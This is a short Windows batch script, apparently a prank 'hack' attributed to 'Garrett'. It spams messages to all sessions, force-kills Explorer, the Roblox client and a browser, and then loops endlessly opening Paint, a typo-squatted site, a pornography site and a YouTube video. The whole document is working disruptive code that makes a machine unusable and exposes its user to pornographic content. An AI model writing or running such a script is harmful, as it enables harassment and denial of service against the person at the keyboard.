msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT
msg * U GOT HACKED BY GARRETT

Taskkill /f /im explorer.exe
Taskkill /f /im robloxgameclient.exe
Taskkill /f /im taskkill brave.exe

:loop 
start mspaint
start www.goggle.com
start www.pornhub.com
start https://www.youtube.com/watch?v=y7km3A7ibUE
goto loop